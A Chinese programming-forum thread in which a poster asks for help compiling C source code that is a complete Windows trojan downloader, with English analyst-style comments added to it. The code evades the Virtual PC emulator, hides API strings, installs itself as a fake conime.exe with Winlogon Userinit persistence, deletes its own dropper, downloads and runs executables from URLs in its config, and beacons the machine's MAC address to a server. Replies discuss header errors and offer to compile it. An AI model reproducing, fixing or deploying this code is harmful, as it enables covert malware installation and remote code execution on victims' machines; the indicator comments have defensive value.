C语言的大牛进来下。小弟实在看不懂了

麒麟, 发表于 2016-8-4 05:14 | 显示全部楼层 |阅读模式

本帖最后由 麒麟, 于 2016-8-4 11:24 编辑

QQ截图20160804051150.png
#include <stdio.h>
#include <shlwapi.h>
#include<wininet.h>
#pragma comment(lib,"wininet.lib")
#pragma comment(lib,"shlwapi.lib")
#pragma comment(lib,"MSVCRT.lib")
#pragma comment (lib,"Urlmon.lib")
#pragma comment(linker, "/OPT:NOWIN98")    // 取消这几行的注释，编译出的文件只有2K大小 (uncomment these lines and the compiled file is only 2K in size)
#pragma comment(linker, "/align:0x200") 
#pragma comment(linker, "/subsystem:windows") 
#pragma comment(linker,"/ENTRY:ProcEntry /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text CTION:.text,EWR /IGNORE:4078")
#include <time.h>
#include <winsock.h>
#include <stdlib.h>
#include <Wininet.h>
#include<Aclapi.h>
#include <io.h>
#pragma comment(lib,"Wininet.lib")
#pragma comment(lib,"ws2_32")


// Function pointer for URLDownloadToFileA. It is resolved at runtime in DownExe
// (LoadLibrary("urlmon.dll") + GetProcAddress) rather than linked, so the
// download API does not appear in the binary's import table.
// Original comment: "dynamically load the UrlDownloadToFileA function from Urlmon.dll".
DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);
// Module handle of the loaded urlmon.dll (assigned in DownExe, never released).
HINSTANCE hurlmon;

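/*
 * Search the first sizem bytes of mem for the byte sequence str.
 *
 *   mem   - haystack (not necessarily NUL-terminated; sizem bounds it)
 *   str   - needle
 *   sizem - number of readable bytes in mem
 *   sizes - length of the needle, or 0 to use strlen(str)
 *
 * Returns the offset of the first occurrence, or -1 if there is none.
 * A match must fit entirely inside mem: the previous version compared
 * mem[i+j] without bounding i+j by sizem and so could read past the end
 * of the haystack on a partial match near its tail.
 */
int memfind(const char *mem, const char *str, int sizem, int sizes)
{
	int da = (sizes == 0) ? (int)strlen(str) : sizes;
	/* i < sizem keeps the empty-needle behaviour of the original (0 for a
	 * non-empty haystack, -1 for an empty one); da <= sizem - i keeps every
	 * mem[i + j] read inside the haystack. */
	for (int i = 0; i < sizem && da <= sizem - i; i++)
	{
		int j;
		for (j = 0; j < da; j++)
		{
			if (mem[i + j] != str[j])
				break;
		}
		if (j == da)
			return i;
	}
	return -1;
}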

#define	MAX_CONFIG_LEN	500	// bytes read from the executable's own tail (PE overlay) that hold the appended config
// Original comment: "look up the configuration information at the end of the file".
//
// Reads the last MAX_CONFIG_LEN bytes of the running executable into a heap
// buffer and searches them for lpString (a marker such as "OOOOOO", "CCCCCC"
// or "VVVVVV" - see the callers). Returns a pointer to the marker inside that
// buffer, or NULL if the file cannot be opened or the marker is absent.
//
// Notes for the reader:
//  - The config lives in data appended after the last PE section; the marker
//    strings there are a static indicator for this sample.
//  - On success the buffer is never freed (callers keep the pointer). On the
//    not-found path it is released with scalar `delete` although it was
//    allocated with `new[]`, which is undefined behaviour.
//  - The SetFilePointer result and ReadFile's byte count (dwBytesRead) are
//    not checked, memfind scans all MAX_CONFIG_LEN bytes regardless, and the
//    buffer is not NUL-terminated here; callers that strchr()/strlen() the
//    result rely on a terminator being part of the appended config.
LPCTSTR FindConfigString( LPCTSTR lpString)
{
	char	strFileName[MAX_PATH];
	char	*lpConfigString = NULL;
	DWORD	dwBytesRead = 0;
	GetModuleFileName(0, strFileName, sizeof(strFileName));	// path of this executable
	
	HANDLE	hFile = CreateFile(strFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
	if (hFile == INVALID_HANDLE_VALUE)
	{
		return NULL;
	}
	
	SetFilePointer(hFile, -MAX_CONFIG_LEN, NULL, FILE_END);	// seek to MAX_CONFIG_LEN bytes before EOF
	lpConfigString = new char[MAX_CONFIG_LEN];
	ReadFile(hFile, lpConfigString, MAX_CONFIG_LEN, &dwBytesRead, NULL);	// result and dwBytesRead unchecked
	CloseHandle(hFile);
	
	int offset = memfind(lpConfigString, lpString, MAX_CONFIG_LEN, 0);	// sizes == 0 -> strlen(lpString)
	if (offset == -1)
	{
		delete lpConfigString;	// mismatched with new[] above
		return NULL;
	}
	else
	{
		return lpConfigString + offset;	// points at the marker; buffer ownership stays with the caller
	}
}

// Downloader stage (called every 20 minutes from ProcEntry).
//
// The strings "URLDownloadToFileA", "urlmon.dll" and the config marker
// "OOOOOO" are assembled one character at a time - presumably to keep them
// out of the binary's plain string table (inference from the pattern). Then:
//  1. FindConfigString("OOOOOO") locates "OOOOOO<list-url>|<save-path>" in
//     the executable's appended config; the text after the marker is split
//     at '|'.
//  2. URLDownloadToFileA (resolved at runtime through hurlmon/DOWNFILE)
//     fetches <list-url> into <save-path>.
//  3. On S_OK, each whitespace-separated token of that file is treated as a
//     URL, downloaded to %TEMP%\<GetTickCount()>.exe and started with
//     WinExec(SW_SHOW).
//  4. <save-path> is deleted.
//
// Returns -1 when no '|' separator is present, 0 otherwise; download and
// execution failures are not reported.
//
// Observations (documented, not changed):
//  - FindConfigString may return NULL; strchr(url, '|') would then
//    dereference NULL, and the later "DownUrl == NULL || SavePath == NULL"
//    test cannot be true once strchr has succeeded.
//  - hurlmon and the GetProcAddress result are used unchecked.
//  - fopen's result feeds fscanf unchecked, "%s" into the 200-byte buffer has
//    no width bound, and stream is fclose'd only when hr == S_OK.
//
// Host indicators: urlmon.dll loaded via LoadLibrary with URLDownloadToFileA
// resolved by GetProcAddress, a list file at the configured <save-path>, and
// <digits>.exe files created in %TEMP% and executed immediately.
int DownExe()
{
	char  strDown[19]; 
	strDown[0]  = 'U';
	strDown[1]  = 'R';
	strDown[2]  = 'L';
	strDown[3]  = 'D';
	strDown[4]  = 'o';
	strDown[5]  = 'w';
	strDown[6]  = 'n';
	strDown[7]  = 'l';
	strDown[8]  = 'o';
	strDown[9]  = 'a';
	strDown[10] = 'd';
	strDown[11] = 'T';
	strDown[12] = 'o';
	strDown[13] = 'F';
	strDown[14] = 'i';
	strDown[15] = 'l';
	strDown[16] = 'e';
	strDown[17] = 'A';
	strDown[18] = '\0';	// "URLDownloadToFileA"
	//MessageBox(0,strDown,"ok", 0);
	
	char  urlmon[11]; 
	urlmon[0]  = 'u';
	urlmon[1]  = 'r';
	urlmon[2]  = 'l';
	urlmon[3]  = 'm';
	urlmon[4]  = 'o';
	urlmon[5]  = 'n';
	urlmon[6]  = '.';
	urlmon[7]  = 'd';
	urlmon[8]  = 'l';
	urlmon[9]  = 'l';
	urlmon[10]  = '\0';	// "urlmon.dll"
	//MessageBox(0,urlmon,"ok", 0);
	
	char  FindStr[7]; 
	FindStr[0]  = 'O';
	FindStr[1]  = 'O';
	FindStr[2]  = 'O';
	FindStr[3]  = 'O';
	FindStr[4]  = 'O';
	FindStr[5]  = 'O';
	FindStr[6]  = '\0';	// "OOOOOO" config marker
	
	
	char *url = NULL;
	char *DownUrl = NULL;
	char *SavePath = NULL;
	url = (char *)FindConfigString(FindStr);	// pointer into a heap buffer, or NULL (unchecked)
	
	char	*pos = strchr(url, '|'); // original: "differs from the earlier version only in reading one more value; the two values are separated by '|'"
	if (pos == NULL)
		return -1;
	*pos = '\0';	// terminate the URL part in place
	DownUrl = url + 6;	// skip the 6-byte "OOOOOO" marker
	SavePath = pos + 1;
	if (DownUrl == NULL || SavePath == NULL)	// cannot be true after the pointer arithmetic above
		return -1;
	
	//MessageBox(0,DownUrl,"ok",0);// original: "display the two separated strings"
	//MessageBox(0,SavePath,"ok",0);
	
    hurlmon=LoadLibrary(urlmon);
    (FARPROC&)DOWNFILE= GetProcAddress(hurlmon,strDown);	// URLDownloadToFileA, resolved at runtime
	HRESULT hr = DOWNFILE(NULL, DownUrl, SavePath, 0, NULL);	// fetch the URL list file

	char strTmpPath[MAX_PATH];
	char strRunPath[MAX_PATH];
	GetTempPath(sizeof(strTmpPath), strTmpPath);
	
	FILE *stream;
	char buffer[200];
	stream  = fopen(SavePath,"r");	// opened unchecked, even if the download failed
	if (hr== S_OK)
	{
		while(fscanf(stream,"%s\n",buffer)==1)	// one URL per whitespace-separated token
		{
			wsprintf(strRunPath,"%s\\%d.exe",strTmpPath,GetTickCount());	// %TEMP%\<tick>.exe
			DOWNFILE(0, buffer, strRunPath, 0, 0);
			//MessageBox(NULL,buffer,"ìáê&#190;",MB_ICONINFORMATION);
			WinExec(strRunPath, SW_SHOW);  	// run the fetched executable
		}
		
		fclose(stream); 
	}
	DeleteFile(SavePath);	// remove the list file
	return 0;
}

// Original comment: "anti-NOD32 detection" - i.e. the author's intent is to
// bail out when running under an emulator/sandbox (ProcEntry exits on TRUE).
//
// Executes the Virtual PC "magic" instruction 0F 3F 07 0B inside an SEH
// frame. On real hardware (and most other environments) it is an invalid
// opcode: the exception is caught by __except and FALSE is returned. If the
// instruction executes without faulting, the function falls through and
// returns TRUE. The trailing bytes C7 45 FC FF FF FF FF encode
// `mov dword ptr [ebp-4], -1`, a write to a stack slot whose purpose is not
// evident from the code.
//
// Note for analysts: an emulator that handles this opcode silently makes the
// sample exit before any of its other behaviour can be observed.
bool IsVirtualPC()
{
	__try
	{
		__asm
		{
			mov eax, 1
				_emit 0x0F
				_emit 0x3F
				_emit 0x07
				_emit 0x0B
				_emit 0xC7
				_emit 0x45
				_emit 0xFC
				_emit 0xFF
				_emit 0xFF
				_emit 0xFF
				_emit 0xFF
		}
	}
	__except(1)	// EXCEPTION_EXECUTE_HANDLER: invalid opcode -> not Virtual PC
	{
		return FALSE;
	}
	return TRUE;	// instruction executed without faulting
}


// Original comment: "write the registry run (entry)".
//
// Persistence: sets HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
// \Userinit to "<windir>\system32\userinit.exe,<windir>\Tasks\conime.exe".
// Winlogon launches every comma-separated program listed in Userinit at
// logon, so the dropped copy (conime.exe, see ProcEntry) starts with each
// interactive logon. Writing under HKLM requires administrative rights.
//
// Observations (documented, not changed):
//  - The RegOpenKey / RegSetValueEx return codes are stored in `ret` but
//    never checked; RegSetValueEx runs even if the open failed.
//  - The value is written with a fixed length of 100 bytes instead of
//    strlen(RegStr)+1, so either stale bytes of the 260-byte buffer past the
//    terminator are stored too, or the string is truncated if it exceeds
//    99 characters.
//
// Detection: alert on any change to the Winlogon\Userinit value; on a clean
// system it references only userinit.exe. This value is the primary
// persistence indicator of the sample.
void WriteReg()
{
	char WinPath[MAX_PATH];
	char OldPath[MAX_PATH];
	char MyPath[MAX_PATH];
	char RegStr[MAX_PATH];
	GetWindowsDirectory(WinPath,sizeof(WinPath));// original: "get the Windows directory"
	wsprintf(OldPath,"%s%s",WinPath,"\\system32\\userinit.exe");	// the legitimate logon helper
	wsprintf(MyPath,"%s%s",WinPath,"\\Tasks\\conime.exe");	// the dropped copy
	wsprintf(RegStr,"%s%s%s",OldPath,",",MyPath);	// "userinit.exe,conime.exe"
	char regname[]="Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon";
	HKEY hkResult;
	int ret=RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult);	// original: "open the key" (result unchecked)
	ret=RegSetValueEx(hkResult,"Userinit",0,REG_SZ,(unsigned char *)RegStr,100);	/* original: "set the key value"; fixed 100-byte length */
	RegCloseKey(hkResult);
}
// Original comment: "self-delete".
//
// Removes the running executable after installation. Writes a batch file
// named afc9fe2f418b00a0.bat in the current directory that:
//   - echoes junk into 3596799a1543bc9f.aqq ten times and deletes it
//     (presumably a crude delay so this process has exited first),
//   - deletes this executable by its full path, then deletes the batch
//     file itself,
// runs the batch hidden with WinExec and terminates via ExitProcess.
//
// Observations (documented, not changed):
//  - Line endings are written as "\n\r" (LF CR), the reverse of CRLF.
//  - The whole 2048-byte `command` array is written, including its trailing
//    zero bytes; the CreateFile/WriteFile results are not checked.
//  - ExitProcess(NULL) passes a pointer constant where a UINT exit code is
//    expected (effectively exit code 0).
//
// Forensics: afc9fe2f418b00a0.bat and 3596799a1543bc9f.aqq in the dropper's
// working directory, and a hidden cmd.exe child deleting the dropper, are
// the artefacts of this routine.
void uninstall(void)
{
	int i;
	HANDLE hFile;
	DWORD dwWritten;
	char selfpathaaa[MAX_PATH]={0};
	char command[2048]={0};
	char name[]="afc9fe2f418b00a0.bat";
	GetModuleFileName(NULL,selfpathaaa,MAX_PATH);	// own path, to be deleted by the batch
	lstrcpy(command,"@echo off\n\r");
	for (i=0;i<10;i++) 
		lstrcat(command,"@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq\n\r");	// filler writes (delay)
	lstrcat(command,"@del 3596799a1543bc9f.aqq\n\r");
	lstrcat(command,"@del \"");
	lstrcat(command,selfpathaaa);	// @del "<own path>"
	lstrcat(command,"\"\n\r");
	lstrcat(command,"@del ");
	lstrcat(command,name);	// the batch deletes itself last
	lstrcat(command,"\n\r@exit");
	hFile=CreateFile(name,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);
	WriteFile(hFile,(LPCVOID)command,sizeof(command),&dwWritten,NULL);	// writes all 2048 bytes
	CloseHandle(hFile);
	WinExec(name,SW_HIDE);	// run the batch without a window
	ExitProcess(NULL);
}


/* Skip a run of leading 'V' characters (the "VVVVVV" config marker) and
 * return a pointer to the first character that is not 'V' - the NUL
 * terminator if the string consists only of 'V's. The string is not
 * modified. */
char   *ltrim_VVVVVV(char   *pstr)
{
	char *cursor = pstr;
	for (; *cursor == 'V'; ++cursor)
	{
		/* advance past the marker run */
	}
	return cursor;
}
/* Skip a run of leading 'C' characters (the "CCCCCC" config marker) and
 * return a pointer to the first character that is not 'C' - the NUL
 * terminator if the string consists only of 'C's. The string is not
 * modified. */
char   *ltrim_CCCCCC(char   *pstr)
{
	size_t skipped = 0;
	while (pstr[skipped] == 'C')
		skipped++;
	return pstr + skipped;
}

#include "Rpcdce.h" 
#pragma comment(lib,"Rpcrt4.lib") 
// Check-in / statistics beacon (the caller's comment reads "statistics").
//
// Reads two values from the config appended to the executable,
// "CCCCCC<count-url>" and "VVVVVV<version>" (the marker letters are stripped
// by ltrim_CCCCCC / ltrim_VVVVVV), builds a host identifier from the last six
// bytes (Data4[2..7]) of a sequential, version-1 UUID - which normally carry
// the NIC's MAC address - and issues an HTTP GET through WinINet to
//     <count-url>?mac=xx-xx-xx-xx-xx-xx&ver=<version>
// with the User-Agent string "Google page". The response is read once into a
// 1 KB buffer and discarded.
//
// Observations (documented, not changed):
//  - Both FindConfigString results may be NULL and are passed on unchecked.
//  - sprintf into the MAX_PATH-sized szURL has no length bound.
//  - hNet / hUrlFile are not checked before use; bRead is never read.
//  - If UuidCreateSequential fails, every mac[n] stays empty and the
//    identifier degrades to "-----".
//
// Network detection: a GET carrying User-Agent "Google page" with a query of
// the form "?mac=...&ver=...", repeated every 20 minutes (see ProcEntry), is
// the beacon signature of this sample.
void MyCount()
{
	char szURL[MAX_PATH];

	char *MyUrl = NULL;
	char *CountUrl = NULL;
	MyUrl = (char *)FindConfigString("CCCCCC");	// may be NULL
	CountUrl = ltrim_CCCCCC(MyUrl);	// text after the "CCCCCC" marker


	char *pVersionStr = NULL;
	char *pVersion = NULL;
	pVersionStr = (char *)FindConfigString("VVVVVV");	// may be NULL
	pVersion = ltrim_VVVVVV(pVersionStr);	// text after the "VVVVVV" marker
	
	long rt;  
	UUID ui;
	char mac[6][10]={0};
	char temp[MAX_PATH];
	char Mac[MAX_PATH];
	rt = UuidCreateSequential(&ui);	// version-1 UUID: node field holds the MAC
	if (rt == RPC_S_OK)
	{
        _itoa(ui.Data4[2],mac[0],16);	// six node bytes as lowercase hex
		_itoa(ui.Data4[3],mac[1],16);
		_itoa(ui.Data4[4],mac[2],16);
		_itoa(ui.Data4[5],mac[3],16);
		_itoa(ui.Data4[6],mac[4],16);
		_itoa(ui.Data4[7],mac[5],16);
	}
	for(int n=0;n<6;n++)
	{
		if (strlen(mac[n]) == 1)	// left-pad single hex digits to two characters
		{
            wsprintf(temp, "0%s", mac[n]);
            strcpy(mac[n],temp);
		}
	}
	wsprintf(Mac, "%s-%s-%s-%s-%s-%s",mac[0],mac[1],mac[2],mac[3],mac[4],mac[5]);	// xx-xx-xx-xx-xx-xx

	sprintf(szURL,"%s?mac=%s&ver=%s",CountUrl,Mac,pVersion);				// original: "use the globally unique string as the identifier"
	//MessageBox(NULL,szURL,"ìáê&#190;",MB_ICONINFORMATION);

	HINTERNET hNet = ::InternetOpen("Google page", // user-agent string; original: "when HTTP is used this parameter can be set to anything"
		PRE_CONFIG_INTERNET_ACCESS, // original: "access type tells the Win32 network functions to use the registered settings to find a server"
		NULL,
		INTERNET_INVALID_PORT_NUMBER, // original: "equivalent to supplying the default port number"
		0 // original: "flag: Internet functions using the returned handle will NOT report status to a callback"
		) ;
	HINTERNET hUrlFile = ::InternetOpenUrl(hNet, // handle returned by InternetOpen (unchecked)
		szURL, // the URL to open
		NULL, // extra headers sent to the server, normally NULL
		0, // length of the extra headers, normally 0
		INTERNET_FLAG_RELOAD, // behaviour flags for InternetOpenUrl (bypass cache)
		0) ; // no status information is sent to a callback
	
	char buffer[1024] ;
	DWORD dwBytesRead = 0;
	BOOL bRead = ::InternetReadFile(hUrlFile, // handle returned by InternetOpenUrl (unchecked)
		buffer, // buffer receiving the data
		sizeof(buffer),
		&dwBytesRead); // receives the number of bytes read into the buffer
	// original: "if the return value is TRUE and this is 0, the end of the file has been reached" - the response is otherwise ignored
	
	::InternetCloseHandle(hUrlFile) ;
	::InternetCloseHandle(hNet) ;
}


// Program entry point (linker option /ENTRY:ProcEntry above; no CRT main).
//
// Flow:
//  1. Exit immediately if IsVirtualPC() reports an emulated environment.
//  2. Compare the directory this module runs from with <windir>\Tasks
//     (case-insensitive). If it is not already there (install path): delete
//     any existing <windir>\Tasks\conime.exe, write the Userinit persistence
//     value (WriteReg), copy itself there as conime.exe, start the copy
//     hidden, wait, then remove the original via uninstall().
//  3. Otherwise (running as the installed copy): six iterations of
//     DownExe() + MyCount() with a 20-minute sleep between them
//     (original comment: "download every 20 minutes"), then ExitProcess.
//     The copy is started again at the next logon by the Userinit entry.
//
// Observations (documented, not changed):
//  - The `return 0` after ExitProcess(0) is unreachable.
//  - "\\Tasks" and "\\conime.exe" are strcat'ed onto the MAX_PATH WinPath
//    buffer without a length check.
//
// Host indicators: a binary named conime.exe running from <windir>\Tasks
// (the legitimate conime.exe lives in system32), the modified
// Winlogon\Userinit value, and the batch-file self-deletion of the original
// dropper.
int ProcEntry()
{
	if(IsVirtualPC())
	{
		return 0;	// emulator/sandbox suspected: do nothing
	}
	char Mulu[MAX_PATH];
	char WinPath[MAX_PATH];
	char MyPath[MAX_PATH];

	GetModuleFileName(0,Mulu,sizeof(Mulu));
	PathRemoveFileSpec(Mulu);	// Mulu = directory this module runs from
	
	GetWindowsDirectory(WinPath,sizeof(WinPath));// original: "get the Windows directory"
	strcat(WinPath,"\\Tasks");	// install directory: <windir>\Tasks
	GetModuleFileName(0,MyPath,sizeof(MyPath));	// full path of this executable

	//MessageBox(NULL,Mulu,"ìáê&#190;",MB_ICONINFORMATION);
	//MessageBox(NULL,WinPath,"ìáê&#190;",MB_ICONINFORMATION);
	if (stricmp(Mulu,WinPath) != 0)		// original: "if not already in the Windows directory, copy itself there"
	{
		strcat(WinPath,"\\conime.exe");
		DeleteFile(WinPath);	// replace any previous copy
		WriteReg();// original: "write the registry to achieve auto-start"
		CopyFile(MyPath,WinPath,false);	// bFailIfExists = FALSE: overwrite
		Sleep(500);
		WinExec(WinPath,SW_HIDE);	// start the installed copy hidden
		Sleep(1000);
		uninstall();	// delete this original; does not return
		ExitProcess(0);
	}

	int i = 0;
	while(i < 6)	// original: "download every 20 minutes"; six rounds, then exit
	{
		DownExe();
		MyCount();	// original: "statistics" (beacon)
		Sleep(20 * 60 * 1000);
		i++;
	}
	ExitProcess(0);
	return 0;	// unreachable
} 







fresharplite 发表于 2016-8-4 05:14 | 显示全部楼层

 楼主| 麒麟, 发表于 2016-8-4 05:15 | 显示全部楼层

该怎么修改  麻烦大牛说下
几何 发表于 2016-8-4 07:25 | 显示全部楼层

把你的那个CPP文件发出来,问题在哪,而不是shlwapi.h,VC++6.0比较笨
微若清风 发表于 2016-8-4 07:42 | 显示全部楼层

我不是大牛。我也进来看看
LYQingYe 发表于 2016-8-4 08:30 | 显示全部楼层
 楼主| 麒麟, 发表于 2016-8-4 11:25 | 显示全部楼层

LYQingYe 发表于 2016-8-4 08:30
你把系统头文件发出来有何用

发出来了   麻烦看下
 楼主| 麒麟, 发表于 2016-8-4 11:26 | 显示全部楼层

几何 发表于 2016-8-4 07:25
把你的那个CPP文件发出来,问题在哪,而不是shlwapi.h,VC++6.0比较笨

发出来了  麻烦看下
 楼主| 麒麟, 发表于 2016-8-4 11:46 | 显示全部楼层

fresharplite 发表于 2016-8-4 06:15
在代码最前面
     #define EXTERN_C     extern "C"

表示没搞懂
fresharplite 发表于 2016-8-4 12:38 | 显示全部楼层

发代码来我帮你编译算了